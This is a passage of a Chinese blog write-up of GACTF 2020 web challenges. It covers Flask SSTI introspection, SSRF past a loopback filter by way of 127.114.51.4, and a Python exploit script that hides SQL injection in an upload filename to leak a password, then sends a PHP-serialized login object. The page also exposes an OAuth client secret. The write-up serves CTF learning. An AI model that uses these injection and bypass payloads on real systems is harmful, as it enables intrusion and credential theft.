<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;ctf.__code__.co_consts&#125;&#125;:</span><br><span class="line">可知：</span><br><span class="line"></span><br><span class="line">hint = <span class="string">&#x27;the admin route :h4rdt0f1nd_9792uagcaca00qjaf&lt;!-- port : 5000 --&gt;&#x27;</span></span><br><span class="line">trick = <span class="string">&#x27;too young too simple&#x27;</span></span><br></pre></td></tr></table></figure>
<p>提示说5000端口有另一个服务。但是当我们尝试访问<code>127.0.0.1</code>时发现有waf。梅开二度，我们可以通过<code>__code__</code>来大体看到waf规则：</p>
<img src="/2020/09/01/Security/Writeup/GACTF-2020-Web/upload_f4abe482d6ed5160ea58f93868f0cce4.png" class="" title="Result">
<p>0.0被过滤了。冷知识时间：本地回环地址为<code>127.0.0.0/8</code>，这个掩码<code>8</code>是不是看起来不太直观？我们换个样子试试：<code>255.0.0.0</code>。</p>
<p>所以访问<code>127.114.51.4:5000</code>，看到内层的应用是一个裸的ssti，flag在app.config里。然而ssrf的path在外层进行了过滤(<code>waf_path</code>)。很可惜，<code>waf_path.__code__.co_consts</code>由于长度问题被过滤了，过滤规则只能通过盲猜。</p>
<p>经过一系列尝试，在<code>url_for.__globals__.current_app</code>找到了app对象。</p>
<h2 id="carefuleyes">carefuleyes</h2>
<p>整体上就是Hitcon 2016 babytrick梅开二度，随便找一个注入点就行了</p>
<p>rename.php中有一个自注入，很刻意</p>
<p>我 注 我 自 己</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> requests <span class="keyword">import</span> session</span><br><span class="line"><span class="keyword">from</span> phpserialize <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ses = session()</span><br><span class="line"><span class="comment"># host = &#x27;http://124.71.191.175&#x27;</span></span><br><span class="line">host = <span class="string">&#x27;http://202.182.118.236&#x27;</span></span><br><span class="line"><span class="comment"># host = &#x27;http://localhost&#x27;</span></span><br><span class="line"></span><br><span class="line">file = <span class="string">&#x27;frankli\&#x27; and 1=0 union select 1,`password` as filename,3,4,5 from user where username=\&#x27;XM\&#x27; #.txt&#x27;</span></span><br><span class="line">ses.post(host + <span class="string">&#x27;/upload.php&#x27;</span>, files=&#123;</span><br><span class="line">    <span class="string">&#x27;upfile&#x27;</span>: (file, <span class="string">&#x27;b&#x27;</span>)</span><br><span class="line">&#125;).text</span><br><span class="line">passwd = ses.get(host + <span class="string">&#x27;/rename.php&#x27;</span>, params=&#123;</span><br><span class="line">    <span class="string">&#x27;oldname&#x27;</span>: file[:-<span class="number">4</span>],</span><br><span class="line">    <span class="string">&#x27;newname&#x27;</span>: <span class="string">&#x27;asdf&#x27;</span></span><br><span class="line">&#125;).text</span><br><span class="line">passwd = passwd[<span class="number">14</span>:passwd.find(<span class="string">&#x27;will be changed&#x27;</span>) - <span class="number">1</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">XCTFGG</span>:</span></span><br><span class="line">    private_method = <span class="string">&#x27;login&#x27;</span></span><br><span class="line">    private_args = [<span class="string">&#x27;XM&#x27;</span>, passwd]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(ses.post(host + <span class="string">&#x27;/upload.php&#x27;</span>, files=&#123;</span><br><span class="line">    <span class="string">&#x27;upfile&#x27;</span>: (<span class="string">&#x27;frank.txt&#x27;</span>, <span class="string">&#x27;c&#x27;</span>)</span><br><span class="line">&#125;, params=&#123;</span><br><span class="line">    <span class="string">&#x27;data&#x27;</span>: serialize(XCTFGG())</span><br><span class="line">&#125;).text)</span><br></pre></td></tr></table></figure>
<h2 id="simple-flask-与-XWiki">simple flask 与 XWiki</h2>
<p>略。simple flask抢了个一血，挺开心的（</p>

<div id="gitalk-container"></div>
<script src="https://cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script><link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css"><script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

		<script>
		var gitalkConfig = {"clientID":"5955d155fe2ea768241e","clientSecret":"f96bbda9ff434950217f24f7f9369f8b8de3b025","repo":"frankli0324.github.io","owner":"frankli0324","admin":["frankli0324"],"distractionFreeMode":false};
	    gitalkConfig.id = md5(location.pathname);
		var gitalk = new Gitalk(gitalkConfig);
	    gitalk.render("gitalk-container");
	    </script><link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
  </div>
</article>




        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#babyshop"><span class="toc-number">1.</span> <span class="toc-text">babyshop</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E8%A7%A3%E6%B3%95"><span class="toc-number">1.1.</span> <span class="toc-text">最简单的解法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%87%BA%E9%A2%98%E4%BA%BA%E5%8F%AF%E8%83%BD%E9%A2%84%E6%9C%9F%E7%9A%84%E8%A7%A3%E6%B3%95"><span class="toc-number">1.2.</span> <span class="toc-text">出题人可能预期的解法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EZFLASK"><span class="toc-number">2.</span> <span class="toc-text">EZFLASK</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#carefuleyes"><span class="toc-number">3.</span> <span class="toc-text">carefuleyes</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#simple-flask-%E4%B8%8E-XWiki"><span class="toc-number">4.</span> <span class="toc-text">simple flask 与 XWiki</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&text=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&is_video=false&description=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=GACTF 2020 Web 部分题目 Writeup&body=Check out this article: https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&name=GACTF 2020 Web 部分题目 Writeup&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&t=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2017-2021
    Frank Li
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.3/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-131292248-2"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-131292248-2');
    </script>

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
